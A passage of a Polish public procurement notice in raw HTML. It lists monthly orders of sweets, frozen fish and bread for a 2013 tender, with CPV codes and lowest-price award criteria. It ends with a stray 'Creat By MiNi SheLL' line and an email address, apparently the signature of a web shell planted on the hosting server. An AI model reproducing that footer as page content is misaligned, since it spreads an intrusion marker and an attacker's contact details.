64. Czekolada nadziewana 100g	1 szt.
65. Batony pawełki 45 g lub równoważne	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup i dostawa ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. 	Nazwa produktu	ilość	jednostka
1. ryba panga	1 kg
2. ryba mrożona dorsz 	1 kg
3. ryba mrożona miruna 	23 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakup i dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. Nazwa produktu 	ilość  	jednostka
1. pączki	35 szt.
2. bułka słodka z kruszonką	55 szt.
3. bułka słodka z dżemem	55 szt.
4. bułka słodka z budyniem	55 szt.
5. chleb pełnoziarnisty (krojony)	20 szt.
6. chleb krojony 	91 szt.
7. bułki grahamki	40 szt.
8. bułki poznańskie	34 szt.
9. bułki kajzerki	370 szt.
10. bułka tarta	40 szt.
11. ciasto drożdżowe Słubickie lub równoważne	5 szt.
12. precelki	6 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com